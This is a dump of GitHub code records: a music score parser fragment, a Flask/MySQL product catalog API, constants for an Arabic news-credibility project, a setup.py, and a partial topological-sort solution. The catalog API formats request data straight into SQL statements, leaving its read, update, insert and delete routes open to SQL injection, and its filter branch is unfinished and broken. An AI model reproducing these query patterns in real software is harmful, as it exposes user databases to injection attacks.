else: # otherwise try to find *,+, or there will be only one year\n if \"*\" in n.group(2):\n o = t.match(n.group(2)[1:]) if len(n.group(2)[1:]) == 4 else None\n if o is not None and o.group(0) != \"\":\n born = int(o.group(0))\n elif \"+\" in n.group(2):\n o = t.match(n.group(2)[1:]) if len(n.group(2)[1:]) == 4 else None\n if o is not None and o.group(0) != \"\":\n died = int(o.group(0))\n else: # when there is only one year, i assign it to born\n o = t.match(n.group(2)) if len(n.group(2)) == 4 else None\n if o is not None and o.group(0) != \"\":\n born = int(o.group(0))\n tmpValues.composers.append(Person(name, born, died))\n # DONE\n if line.startswith(\"Title\"):\n r = re.compile(r\"Title: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n title = m.group(1).strip()\n tmpValues.title = None if title == \"\" else title\n # DONE\n if line.startswith(\"Genre\"):\n r = re.compile(r\"Genre: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n genre = m.group(1).strip()\n tmpValues.genre = None if genre == \"\" else genre\n # DONE\n if line.startswith(\"Key\"):\n r = re.compile(r\"Key: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n key = m.group(1).strip()\n tmpValues.key = None if key == \"\" else key\n # DONE\n if line.startswith(\"Composition Year\"):\n r = re.compile(r\"Composition Year: (\\d{4})\")\n m = r.match(line)\n if m is not None:\n tmpValues.comp_year = int(m.group(1)) if len(m.group(1)) == 4 else None\n # DONE\n if line.startswith(\"Edition\"):\n r = 
re.compile(r\"Edition: (.*)\")\n m = r.match(line)\n edition = m.group(1).strip()\n tmpValues.edition = None if edition == \"\" else edition\n # DONE\n if line.startswith(\"Editor\"):\n r = re.compile(r\"Editor: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n r = re.compile(r\"((\\w+, \\w+.?),?)+\") # pattern for word, word = lastname, firstname and there may be comma and other persons\n text = m.group(1)\n if r.match(text) is not None: # if firstname and lastname are separated by comma\n while text != \"\":\n m = r.match(text) # match them\n tmpValues.editors.append(Person(m.group(2).strip(), None,None))# add them to output\n text = text.replace(m.group(2), \"\")[2:] # remove them from string; # [2:] because there is \", \" left in the beginning\n else: # if firstname and lastname are together, and persons are separated by comma\n comps = text.split(\",\")\n for comp in comps:\n tmpValues.editors.append(Person(comp.strip(),None,None))\n # DONE\n if line.startswith(\"Voice\"):\n n = re.compile(r\"Voice (\\d*):(.*)\")\n o = n.match(line)\n if o is None:\n print(\"\\\"{}\\\"\".format(line))\n number = int(o.group(1).strip())\n voice = o.group(2).strip() if o is not None else None\n range = None\n name = None\n if voice is not None and voice != \"\": # if there is some voice\n r = re.compile(r\"(\\w+--[\\w\\(\\)]+).*\") # match two words and \"--\"\" between them\n m = r.match(voice)\n if m is not None: # if there is range\n range = m.group(1)\n voice = voice.replace(m.group(1),\"\")[2:].strip() # strip range and \", \"\n name = None\n if voice != \"\":\n name = voice # if there is anything left for the name, assign it\n else: # there is no range\n name = voice.strip()\n # else: # there is no voice, but i need to remember position (Voice Number)\n # tmpValues.voices.append(None)\n while len(tmpValues.voices) < number-1:\n tmpValues.voices.append(None)\n if name == None and range == None:\n tmpValues.voices.append(None)\n else:\n tmpValues.voices.append(Voice(name,range))\n # DONE\n if line.startswith(\"Partiture\"):\n r = re.compile(r\"Partiture: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\": \n partiture = m.group(1).strip()\n if \"yes\" in partiture:\n tmpValues.partiture = True\n # DONE\n if line.startswith(\"Incipit\"):\n r = re.compile(r\"Incipit: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n incipit = m.group(1).strip()\n if incipit != \"\" and tmpValues.incipit == None:\n tmpValues.incipit = incipit\n # on last print it doesnt catch new line at the end of the file\n # so after assigning all tmpValues, it ends reading the file in Incipit\n # and doesnt add it to prints\n # till it is still saved in tmValues\n # i can add that print afterwards\n # when there are two new lines at the end\n # then the last print will be added in for loop\n # and this condition catches that option\n # so it wont add new new print with deafalut None print number\n if tmpValues.print_num is not None:\n prints.append(Print(Edition(Composition(tmpValues.title\n ,tmpValues.incipit,tmpValues.key,tmpValues.genre\n ,tmpValues.comp_year,tmpValues.voices\n ,tmpValues.composers),tmpValues.editors\n ,tmpValues.edition),tmpValues.print_num\n ,tmpValues.partiture))\n return prints\n","repo_name":"makovako/PV248-valko","sub_path":"03-database/scorelib.py","file_name":"scorelib.py","file_ext":"py","file_size_in_byte":12959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"27354979350","text":"from flask import Flask,redirect,url_for,request,render_template, jsonify\nfrom flask_restful import reqparse\nfrom flask_mysqldb import MySQL\nimport yaml\n\n\napp = Flask(__name__)\n\n#Configure db\ndb = yaml.load(open('db.yaml'))\napp.config['MYSQL_HOST'] = db['mysql_host']\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\n\nmysql = MySQL(app)\n\n\n@app.route('/query', methods=['POST'])\ndef query():\n\tdata = request.get_json()\n\tcur = mysql.connection.cursor()\n\tif data['query'] == 'SORT':\n\t\tif data['props']==0:\n\t\t\tx = \"name\"\n\t\tif data['props']==1:\n\t\t\tx = \"name\"\n\t\tif data['props']==2:\n\t\t\tx = \"name desc\"\n\n\t\tresult = cur.execute(\"select * from products order by {}\".format(x))\n\n\t\tprods = []\n\t\tprodDetails = cur.fetchall()\n\t\t\t\t\n\t\tfor item in prodDetails:\n\t\t\tprods.append({\n\t\t\t\t'productID' : item[0],\n\t\t\t\t'name' : item[1],\n\t\t\t\t'url' : item[3],\n\t\t\t\t'price' : item[6]\n\t\t\t})\n\t\t\t\n\t\tmysql.connection.commit()\n\t\tcur.close()\n\t\treturn jsonify({'prods':prods})\n\n\tif data['query'] == 'FILTER':\n\t\tqueryStr=\"\"\n\t\tif data['brand']:\n\t\t\ts = \"(\"\n\t\t\tfor x in range(data['brand']):\n\t\t\t\tx_val = data['brand'][x];\n\t\t\t\ts = s+\"'\"+x_val+\"',\" \n\t\t\ts = s[:-1]+\")\"\n\t\t\tqueryStr= queryStr + \"brand in \" + s\n\n\t\tif data['price']:\n\t\t\tfor x in data['price']:\n\t\t\t\tif x==0:\n\t\t\t\t\tqueryStr = queryStr + \"and price between 0 and 499\"\n\t\t\t\tif x==1:\n\t\t\t\t\tqueryStr = queryStr + \"and price between 500 and 999\"\n\t\t\t\tif x==2:\n\t\t\t\t\tqueryStr = queryStr + \"and price >= 1000\"\n\t\t\t\n\t\tif data['color']:\n\t\t\ts = \"(\"\n\t\t\tfor x in range(data['color']):\n\t\t\t\tx_val = data['color'][x];\n\t\t\t\ts = s+\"'\"+x_val+\"',\" \n\t\t\ts = s[:-1]+\")\"\n\t\t\tqueryStr= queryStr + \"color in \" + s\n\t\t\t\n\t\tcur.execute(\"select * from products where brand in {} and color in {} and price between\".format())\n\n\n# @app.route('/fliter',methods=['POST'])\n# def filter():\n# \tdata = request.get_json()\n\n\n# @app.route('/validateInventory/')\n# def val(prodID):\n# \treturn #\"yes\" or \"no\"\n\n# @app.route('/prodDescription/')\n# def prodDescription(prodID):\n# \treturn #description\n\n# @app.route('/inventoryUpdate',methods=['POST'])\n# def inventoryUpdate():\n# \tdata = request.get_json()\n# \treturn #Success or Failure\n\n\n#Admin CRUD APIs\n\n@app.route('/admin/',methods=['POST', 'DELETE'])\ndef crudOps(type):\n\tcur = mysql.connection.cursor()\n\tif request.method == 'POST':\n\t\tif type == 'READ':\n\t\t\tdata = request.get_json()\n\n\t\t\tresult = cur.execute(\"select * from products where {} = '{}'\".format(data['category'], data['value']))\n\n\t\t\tprods = []\n\t\t\t\n\t\t\tif(result > 0):\n\t\t\t\tprodDetails = cur.fetchall()\n\t\t\t\t\n\t\t\t\tfor item in prodDetails:\n\t\t\t\t\tprods.append({\n\t\t\t\t\t\t'productID' : item[0],\n\t\t\t\t\t\t'name' : item[1],\n\t\t\t\t\t\t'url' : item[3],\n\t\t\t\t\t\t'price' : item[6]\n\t\t\t\t\t})\n\t\t\t\t\n\t\t\tmysql.connection.commit()\n\t\t\tcur.close()\n\t\t\treturn jsonify({'prods':prods})\n\n\t\tif type == 'UPDATE':\n\t\t\tdata = request.get_json()\n\n\t\t\tif(data['name']):\n\t\t\t\tcur.execute(\"update products set name = '{}' where productID = {}\".format(data['name'], data['productID']))\n\n\t\t\tif(data['url']):\n\t\t\t\tcur.execute(\"update products set imageURL = '{}' where productID = 
{}\".format(data['url'], data['productID']))\n\n\t\t\tif(data['price']):\n\t\t\t\tcur.execute(\"update products set price = {} where productID = {}\".format(data['price'], data['productID']))\n\n\t\t\tmysql.connection.commit()\n\t\t\tcur.close()\n\n\t\t\treturn 'success'\n\t\t\n\t\t# Create product\n\t\tdata = request.get_json()\n\n\t\ttag = data['brand'] + '-' + data['color'] + '-' + str(data['price'])\n\t\t\t\n\n\t\tcur.execute(\"insert into products(name, description, imageURL, brand, color, price, category,createTime) values('{}','{}','{}','{}','{}',{},'{}',CURRENT_TIMESTAMP())\".format(data['name'],data['description'],data['url'],data['brand'],data['color'],data['price'],data['category']))\n\t\tmysql.connection.commit()\n\n\t\tresult = cur.execute(\"select * from products\")\n\t\tout = cur.fetchall();\n\t\tx = out[-1][0];\n\n\t\tcur.execute(\"insert into tags values({},'{}')\".format(x,tag))\n\t\tcur.execute(\"insert into inventory values({},{})\".format(x,data['qty']))\n\n\t\tmysql.connection.commit()\n\t\tcur.close()\n\n\t\treturn 'success'\n\n\t#DELETE\n\tdata = request.get_json()\n\tcur.execute(\"delete from products where productID = {}\".format(data['productID']))\n\tmysql.connection.commit()\n\tcur.close()\n\n\treturn 'success'\n\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run()","repo_name":"utknyk/serverCatlog","sub_path":"catlog.py","file_name":"catlog.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69949348268","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os.path\nimport string\n\nDATA_DIR='../data'\nLOG_DIR='../log'\nRESOURCES_DIR='../../../../resources'\n\nRSS_DIR=os.path.join(DATA_DIR, 'rss')\nRSS_URLS_DIR=os.path.join(RSS_DIR, 'urls')\nRSS_HTML_DIR=os.path.join(RSS_DIR, 'html')\nRSS_HTML_INDEX_DIR=os.path.join(RSS_DIR, 'index')\nRSS_LOG_DIR=os.path.join(LOG_DIR, 'rss')\nLABEL_SINCE_FILE=os.path.join(RSS_URLS_DIR, 'label_since.json')\n\n\nFB_DIR=os.path.join(DATA_DIR, 'fb')\nFB_URLS_DIR=os.path.join(FB_DIR, 'urls')\nFB_HTML_DIR=os.path.join(FB_DIR, 'html')\nFB_HTML_INDEX_DIR=os.path.join(FB_DIR, 'index')\nFB_LOG_DIR=os.path.join(LOG_DIR, 'fb')\n\nHTML_PARSER_LOG_DIR=os.path.join(LOG_DIR, 'html_parser')\n\nARABIC_VERBS_FILE=os.path.join(RESOURCES_DIR, 'arabic_verbs.txt')\nENGLISH_VERBS_FILE=os.path.join(RESOURCES_DIR, 'english_verbs.txt')\nSENTIWORDNET_FILE=os.path.join(RESOURCES_DIR, 'SentiWordNet_3.0.0_20130122.txt')\n\nMCE = os.path.join(DATA_DIR, 'mce')\nMCE_PAGES = os.path.join(MCE, 'pages')\nMCE_PAGES_TRUSTED = os.path.join(MCE_PAGES, 'trusted')\nMCE_PAGES_UNTRUSTED = os.path.join(MCE_PAGES, 'untrusted')\n\nMCE_COMPLAINTS = os.path.join(MCE, 'complaints')\nMCE_COMPLAINTS_TRUSTED = os.path.join(MCE_COMPLAINTS, 'trusted')\nMCE_COMPLAINTS_UNTRUSTED = os.path.join(MCE_COMPLAINTS, 'untrusted')\n\nNEWS_HTML_BY_MCE = os.path.join(MCE, 'html')\nTRUSTED_NEWS_HTML_BY_MCE = os.path.join(NEWS_HTML_BY_MCE, 'trusted')\nUNTRUSTED_NEWS_HTML_BY_MCE = os.path.join(NEWS_HTML_BY_MCE, 'untrusted')\n\nANALYSIS_LOG_DIR = os.path.join(LOG_DIR, 'analysis')\n\n# Log levels\nLOG_INFO_LEVEL = 'INFO'\nLOG_ERROR_LEVEL = 'ERROR'\n\n# News sites 
names\nAHRAM='Alahram.Newspaper'\nAKHBAR='akhbarelyomgate'\nALMASRY_ELYOM='almasryalyoum'\nBBC_ARABIC='bbcarabicnews'\nCNN_ARABIC='cnnarabic'\nDOSTOR='aldostornews'\nDOSTOR_ASLY='El.Dostor.News'\nFAGR='elfagr'\nMASRAWY='masrawy'\nSHOROUK='shorouknews'\nTAHRIR='Tahrir.News.Official'\nWATAN='ElWatanNews'\nYOUM7='officialyoum77'\n# NOT IN FB\n#HURRYH='hurryh'\nFJP='fjp'\nENGLISH_FJP='englishFjp'\nENGLISH_AHRAM='englishAhram'\n# supported by MCE Watch\nAKHBAR_MASR='akhbarmasr'\nRASD='rasd'\nMASRYOON='almasryoon'\nWAFD='alwafd'\nAKHBAR_ELYOM='akhbarelyom'\nBADIL='elbadil'\n\nEXTRA_MCE_SOURCES = [AKHBAR_MASR, RASD, MASRYOON, WAFD, AKHBAR_ELYOM, BADIL, DOSTOR, AHRAM]\nALL_MCE_SOURCES = EXTRA_MCE_SOURCES + [ALMASRY_ELYOM, SHOROUK, FJP, DOSTOR_ASLY, YOUM7, MASRAWY, TAHRIR, WATAN, FAGR]\n\n# News feeds tags\nACCIDENTS='accidents'\nALL='all'\nARTICLES='articles'\nCASES='cases'\nEGYPT='egypt'\nINVESTIGATIONS='investigations'\nLATEST='latest'\nMIDEAST='mideast'\nPOLITICS='politics'\nWORLD='world'\n\n# Classified news tags\nAHRAM_ACCIDENTS='{0}-{1}'.format(AHRAM, ACCIDENTS)\nAHRAM_CASES='{0}-{1}'.format(AHRAM, CASES)\nAHRAM_EGYPT='{0}-{1}'.format(AHRAM, EGYPT)\nAHRAM_INVESTIGATIONS='{0}-{1}'.format(AHRAM, INVESTIGATIONS)\nAHRAM_POLITICS='{0}-{1}'.format(AHRAM, POLITICS)\nALMASRY_ELYOM_ACCIDENTS='{0}-{1}'.format(ALMASRY_ELYOM, ACCIDENTS)\nALMASRY_ELYOM_EGYPT='{0}-{1}'.format(ALMASRY_ELYOM, EGYPT)\nALMASRY_ELYOM_INVESTIGATIONS='{0}-{1}'.format(ALMASRY_ELYOM, INVESTIGATIONS)\nCNN_ARABIC_LATEST='{0}-{1}'.format(CNN_ARABIC, LATEST)\nCNN_ARABIC_MIDEAST='{0}-{1}'.format(CNN_ARABIC, MIDEAST)\nCNN_ARABIC_WORLD='{0}-{1}'.format(CNN_ARABIC, WORLD)\nDOSTOR_ASLY_ACCIDENTS='{0}-{1}'.format(DOSTOR_ASLY, ACCIDENTS)\nDOSTOR_ASLY_ALL='{0}-{1}'.format(DOSTOR_ASLY, ALL)\nDOSTOR_ASLY_POLITICS='{0}-{1}'.format(DOSTOR_ASLY, POLITICS)\nENGLISH_AHRAM_ALL='{0}-{1}'.format(ENGLISH_AHRAM, ALL)\nENGLISH_AHRAM_EGYPT='{0}-{1}'.format(ENGLISH_AHRAM, EGYPT)\nENGLISH_AHRAM_WORLD='{0}-{1}'.format(ENGLISH_AHRAM, WORLD)\nFAGR_ACCIDENTS='{0}-{1}'.format(FAGR, ACCIDENTS)\nFAGR_EGYPT='{0}-{1}'.format(FAGR, EGYPT)\n#FAGR_LATEST='{0}-{1}'.format(FAGR, LATEST)\nFAGR_WORLD='{0}-{1}'.format(FAGR, WORLD)\nFJP_ALL='{0}-{1}'.format(FJP, ALL)\nFJP_ARTICLES='{0}-{1}'.format(FJP, ARTICLES)\nFJP_INVESTIGATIONS='{0}-{1}'.format(FJP, INVESTIGATIONS)\nFJP_MIDEAST='{0}-{1}'.format(FJP, MIDEAST)\nMASRAWY_ACCIDENTS='{0}-{1}'.format(MASRAWY, ACCIDENTS)\nMASRAWY_MIDEAST='{0}-{1}'.format(MASRAWY, MIDEAST)\nMASRAWY_POLITICS='{0}-{1}'.format(MASRAWY, POLITICS)\nMASRAWY_WORLD='{0}-{1}'.format(MASRAWY, WORLD)\nSHOROUK_ACCIDENTS='{0}-{1}'.format(SHOROUK, ACCIDENTS)\nSHOROUK_MIDEAST='{0}-{1}'.format(SHOROUK, MIDEAST)\nSHOROUK_POLITICS='{0}-{1}'.format(SHOROUK, POLITICS)\nSHOROUK_WORLD='{0}-{1}'.format(SHOROUK, WORLD)\nWATAN_ACCIDENTS='{0}-{1}'.format(WATAN, ACCIDENTS)\nWATAN_INVESTIGATIONS='{0}-{1}'.format(WATAN, INVESTIGATIONS)\nWATAN_LATEST='{0}-{1}'.format(WATAN, LATEST)\nWATAN_POLITICS='{0}-{1}'.format(WATAN, POLITICS)\nYOUM7_ACCIDENTS='{0}-{1}'.format(YOUM7, ACCIDENTS)\nYOUM7_ARTICLES='{0}-{1}'.format(YOUM7, ARTICLES)\nYOUM7_LATEST='{0}-{1}'.format(YOUM7, LATEST)\n\n#DOSTOR website is usually down!\n#HURRYUH is no longer supported\n#ELFAGR-LATEST doesn't send feeds!\n#AHRAM removed support for RSS!\nRSS_LABELS=[AKHBAR, #AHRAM_EGYPT, AHRAM_INVESTIGATIONS,\n #AHRAM_POLITICS, AHRAM_ACCIDENTS, AHRAM_CASES,\n ALMASRY_ELYOM_ACCIDENTS,\n ALMASRY_ELYOM_EGYPT, ALMASRY_ELYOM_INVESTIGATIONS,\n BBC_ARABIC, CNN_ARABIC_LATEST, CNN_ARABIC_MIDEAST,\n CNN_ARABIC_WORLD, 
DOSTOR_ASLY_ACCIDENTS,\n DOSTOR_ASLY_ALL, DOSTOR_ASLY_POLITICS,\n ENGLISH_AHRAM_ALL, ENGLISH_AHRAM_EGYPT,\n ENGLISH_AHRAM_WORLD, ENGLISH_FJP, FAGR_ACCIDENTS,\n FAGR_EGYPT, FAGR_WORLD, WATAN_ACCIDENTS, FJP_ALL,\n FJP_ARTICLES, FJP_INVESTIGATIONS,FJP_MIDEAST,\n WATAN_INVESTIGATIONS, WATAN_LATEST, WATAN_POLITICS,\n MASRAWY_ACCIDENTS, MASRAWY_MIDEAST, MASRAWY_POLITICS,\n MASRAWY_WORLD, YOUM7_ACCIDENTS, YOUM7_ARTICLES,\n YOUM7_LATEST, SHOROUK_ACCIDENTS, SHOROUK_MIDEAST,\n SHOROUK_POLITICS, SHOROUK_WORLD, TAHRIR]\n\nRSS_POLITICS_LABELS=[AKHBAR, ALMASRY_ELYOM_EGYPT, BBC_ARABIC,\n CNN_ARABIC_MIDEAST, DOSTOR_ASLY_POLITICS,\n FAGR_EGYPT, FJP_ALL, WATAN_POLITICS,\n MASRAWY_POLITICS, YOUM7_LATEST,\n SHOROUK_POLITICS, TAHRIR]\n\nFB_PAGES=[AHRAM, AKHBAR, ALMASRY_ELYOM, BBC_ARABIC, CNN_ARABIC,\n DOSTOR, DOSTOR_ASLY, FAGR, SHOROUK, TAHRIR, WATAN,\n YOUM7]\n\nTRANSLATE_TABLE = dict((ord(ch), None) for ch in string.punctuation + string.digits)\nTRANSLATE_TABLE[ord(u'أ')] = ord(u'ا')\nTRANSLATE_TABLE[ord(u'آ')] = ord(u'ا')\nTRANSLATE_TABLE[ord(u'إ')] = ord(u'ا')\nTRANSLATE_TABLE[ord(u'ى')] = ord(u'ي')\n#TRANSLATE_TABLE[ord(u'ؤ')] = ord(u'ء')\n#TRANSLATE_TABLE[ord(u'ئ')] = ord(u'ء')\n#TRANSLATE_TABLE[ord(u'ة')] = ord(u'ه')\nTRANSLATE_TABLE[ord(u'ْ')] = None\nTRANSLATE_TABLE[ord(u'ُ')] = None\nTRANSLATE_TABLE[ord(u'`')] = None\nTRANSLATE_TABLE[ord(u'ٌ')] = None\nTRANSLATE_TABLE[ord(u'ً')] = None\nTRANSLATE_TABLE[ord(u'َ')] = None\nTRANSLATE_TABLE[ord(u'؛')] = None\nTRANSLATE_TABLE[ord(u'~')] = None\nTRANSLATE_TABLE[ord(u'ِ')] = None\nTRANSLATE_TABLE[ord(u'ـ')] = None\nTRANSLATE_TABLE[ord(u'،')] = None\nTRANSLATE_TABLE[ord(u'؟')] = None\nTRANSLATE_TABLE[ord(u'¦')] = None\nTRANSLATE_TABLE[ord(u'»')] = None\nTRANSLATE_TABLE[ord(u'«')] = None\nTRANSLATE_TABLE[ord(u'”')] = None\nTRANSLATE_TABLE[ord(u'“')] = None\n\n\ndef PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(txt):\n whitespace_table = dict([(ord(ch), None) for ch in string.whitespace])\n return txt.strip().translate(TRANSLATE_TABLE).translate(whitespace_table)\n\nMCE_WATCH_HAS_WRONG_INFO = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي على معلومات خاطئة او مغلوطة أو ناقصة (1 درجات)')\nMCE_WATCH_NO_HOW_INFO_GOT = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يشير الى كيفية الحصول على المعلومة (0.5 درجات)')\nMCE_WATCH_NO_ANSWER_WHY = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “لماذا” ؟ (0.5 درجات)')\nMCE_WATCH_MISLEADING_TITLE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي عنوان مخالف للنص (2 درجات)')\nMCE_WATCH_MISLEADING_VIDEO = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الفيديو مخالف او متعارض مع نص الخبر (2 درجات)')\nMCE_WATCH_WRONG_TEMPORAL_SEQUENCE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'التسلسل الزمني للخبر غير سليم (2 درجات)')\nMCE_WATCH_NO_ANSWER_HOW = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “كيف” ؟ (0.5 درجات)')\nMCE_WATCH_BIASED = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر غير حيادي ومنحاز (2 درجات)')\nMCE_WATCH_NO_ANSWER_WHEN = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “متى”؟ (1 درجات)')\nMCE_WATCH_NO_ANSWER_WHERE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يُجيب على سؤال “أين” ؟ (1 درجات)')\nMCE_WATCH_WRONG_STATISTICS = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي على ارقام او بيانات او احصائيات غير دقيقة (2 درجات)')\nMCE_WATCH_NO_SOURCE = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر لا يشير الى هوية المصدر (2 درجات)')\nMCE_WATCH_NO_ANSWER_WHO = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبرلا يُجيب على سؤال “من” ؟ (4 درجات)')\nMCE_WATCH_WRONG_PICS = 
PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبر يحتوي على صور غير سليمة او تم التلاعب بها (1 درجات)')\nMCE_WATCH_OLD_POSTED_AS_NEW = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'خبر قديم نشر على انه خير جديد (3 درجات)')\nMCE_WATCH_WRONG_NEWS = PREPROCESS_MCE_WATCH_JUDGE_CRITERIA(u'الخبرغير صحيح ! (6 درجات)')\n\nMCE_WATCH_JUDGMENT_CRITERIA = [MCE_WATCH_HAS_WRONG_INFO,\n MCE_WATCH_NO_HOW_INFO_GOT,\n MCE_WATCH_NO_ANSWER_WHY,\n MCE_WATCH_MISLEADING_TITLE,\n MCE_WATCH_MISLEADING_VIDEO,\n MCE_WATCH_WRONG_TEMPORAL_SEQUENCE,\n MCE_WATCH_NO_ANSWER_HOW,\n MCE_WATCH_BIASED,\n MCE_WATCH_NO_ANSWER_WHEN,\n MCE_WATCH_NO_ANSWER_WHERE,\n MCE_WATCH_WRONG_STATISTICS,\n MCE_WATCH_NO_SOURCE,\n MCE_WATCH_NO_ANSWER_WHO,\n MCE_WATCH_WRONG_PICS,\n MCE_WATCH_OLD_POSTED_AS_NEW,\n MCE_WATCH_WRONG_NEWS]\n\nMCE_WATCH_SOURCES_MAPPING = {u'اخبار مصر': AKHBAR_MASR,\n u'masrawy': MASRAWY,\n u'egypt': ALMASRY_ELYOM,\n u'رصد': RASD,\n u'المصريون': MASRYOON,\n u'الحرية و العدالة': FJP,\n u'الشروق': SHOROUK,\n u'الوفد': WAFD,\n u'اخبار اليوم': AKHBAR_ELYOM,\n u'التحرير': TAHRIR,\n u'الدستور الاصلي': DOSTOR_ASLY,\n u'اليوم السابع': YOUM7,\n u'البديل': BADIL,\n u'new dostor': DOSTOR,\n u'الوطن': WATAN,\n u'1094': AHRAM,\n u'الفجر': FAGR}\n\nBUCKWALTER_TO_UNICODE = {36: u'\\u0634',\n 38: u'\\u0624',\n 39: u'\\u0621',\n 42: u'\\u0630',\n 60: u'\\u0625',\n 62: u'\\u0623',\n 65: u'\\u0627',\n 68: u'\\u0636',\n 69: u'\\u0639',\n 70: u'\\u064b',\n 72: u'\\u062d',\n 75: u'\\u064d',\n 78: u'\\u064c',\n 83: u'\\u0635',\n 84: u'\\u0637',\n 89: u'\\u0649',\n 90: u'\\u0638',\n 95: u'\\u0640',\n 96: u'\\u0670',\n 97: u'\\u064e',\n 98: u'\\u0628',\n 100: u'\\u062f',\n 102: u'\\u0641',\n 103: u'\\u063a',\n 104: u'\\u0647',\n 105: u'\\u0650',\n 106: u'\\u062c',\n 107: u'\\u0643',\n 108: u'\\u0644',\n 109: u'\\u0645',\n 110: u'\\u0646',\n 111: u'\\u0652',\n 112: u'\\u0629',\n 113: u'\\u0642',\n 114: u'\\u0631',\n 115: u'\\u0633',\n 116: u'\\u062a',\n 117: u'\\u064f',\n 118: u'\\u062b',\n 119: u'\\u0648',\n 120: u'\\u062e',\n 121: u'\\u064a',\n 122: u'\\u0632',\n 123: u'\\u0671',\n 124: u'\\u0622',\n 125: u'\\u0626',\n 126: u'\\u0651'}\n\nUNICODE_TO_BUCKWALTER = {1569: 39,\n 1570: 124,\n 1571: 62,\n 1572: 38,\n 1573: 60,\n 1574: 125,\n 1575: 65,\n 1576: 98,\n 1577: 112,\n 1578: 116,\n 1579: 118,\n 1580: 106,\n 1581: 72,\n 1582: 120,\n 1583: 100,\n 1584: 42,\n 1585: 114,\n 1586: 122,\n 1587: 115,\n 1588: 36,\n 1589: 83,\n 1590: 68,\n 1591: 84,\n 1592: 90,\n 1593: 69,\n 1594: 103,\n 1600: 95,\n 1601: 102,\n 1602: 113,\n 1603: 107,\n 1604: 108,\n 1605: 109,\n 1606: 110,\n 1607: 104,\n 1608: 119,\n 1609: 89,\n 1610: 121,\n 1611: 70,\n 1612: 78,\n 1613: 75,\n 1614: 97,\n 1615: 117,\n 1616: 105,\n 1617: 126,\n 1618: 111,\n 1648: 96,\n 1649: 123}","repo_name":"ibraaaa/news-credibility","sub_path":"src/python/util/const.py","file_name":"const.py","file_ext":"py","file_size_in_byte":15081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25611652223","text":"from setuptools import setup\nfrom codecs import open\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\n# Get the long description from the README file\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name='monitort',\n\n version='1.0.0a1',\n\n description='Asyncio tcp monitor',\n long_description=long_description,\n\n url='https://github.com/teddybear/monitort',\n\n author='Alexey Ismailov',\n author_email='aismailov@ya.ru',\n\n license='MIT',\n\n # See 
https://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Intended Audience :: System Administrators',\n 'Topic :: System :: Systems Administration',\n\n 'License :: OSI Approved :: MIT License',\n\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n\n keywords='hr test monitor tcp asyncio',\n\n py_modules=[\"monitort\"],\n\n install_requires=[\"aiohttp\", \"motor\"],\n\n\n entry_points={\n 'console_scripts': [\n 'monitort-rest=monitort.rest:main',\n 'monitort-checker=monitort.checker:main',\n ],\n },\n)\n","repo_name":"teddybear/monitort","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15346902804","text":"# course taken with pre-requisites\n# program build dependencies\n# can be done using BFS, DFS, and Kahn's algorithm\n# https://leetcode.com/problems/course-schedule-ii/\n\nimport collections\nfrom typing import List\n\n\n# Standalone reference helpers; they assume module-level graph, visited and\n# visiting structures exist before being called.\ndef detect_cycle(node,visited,visiting):\n visited[node]=True\n visiting[node]=True\n for adj in graph[node]:\n if (not visited[adj]) and (detect_cycle(adj,visited,visiting)):\n return True\n elif(visiting[adj]):\n return True\n visiting[node]=False\n return False\n\ndef topological_sort(node):\n for adj in graph[node]:\n if(not visited[adj]):\n topological_sort(adj)\n ans.append(node)\n visited[node]=True\n\ndef findOrder(self, numCourses: int, prerequisites: List[List[int]]) -> List[int]:\n\n # Local copies of the helpers so they close over this call's state.\n def detect_cycle(node):\n visited[node]=True\n visiting[node]=True\n for adj in graph[node]:\n if (not visited[adj]) and detect_cycle(adj):\n return True\n elif(visiting[adj]):\n return True\n visiting[node]=False\n return False\n\n def topological_sort(node):\n for adj in graph[node]:\n if(not visited[adj]):\n topological_sort(adj)\n ans.append(node)\n visited[node]=True\n\n 